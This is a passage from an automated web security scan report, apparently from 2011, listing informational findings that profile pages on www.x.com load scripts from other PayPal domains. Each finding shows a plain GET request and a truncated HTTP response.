User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35333639373b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.211. https://www.x.com/people/PP_MTS_Patrick  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133313833303b332c3132393239303b332c3133373135383b332c3133373331333b332c3132323335343b332c3133393730313b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.212. https://www.x.com/people/PayPalXadmin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.213. https://www.x.com/people/PayPal_Carolyn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.214. https://www.x.com/people/PayPal_Sudha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.215. https://www.x.com/people/PayPal_ToddS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323839313b332c323430323b332c3133363236393b332c3133313833303b332c31323739393b332c3133373331333b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.216. https://www.x.com/people/Praveen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.217. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35353331393b332c35333437343b332c323030383b332c35333436333b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.218. https://www.x.com/people/RightWayMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.219. https://www.x.com/people/S.Aijaz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132393239303b332c3134303635343b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.220. https://www.x.com/people/SRS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.221. https://www.x.com/people/Saleem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.222. https://www.x.com/people/Shade8934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133373131353b332c3133363935343b332c3133383538323b332c35333735313b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.223. https://www.x.com/people/Suneetha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.224. https://www.x.com/people/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.225. https://www.x.com/people/amypiazza00  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.226. https://www.x.com/people/angelleye  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
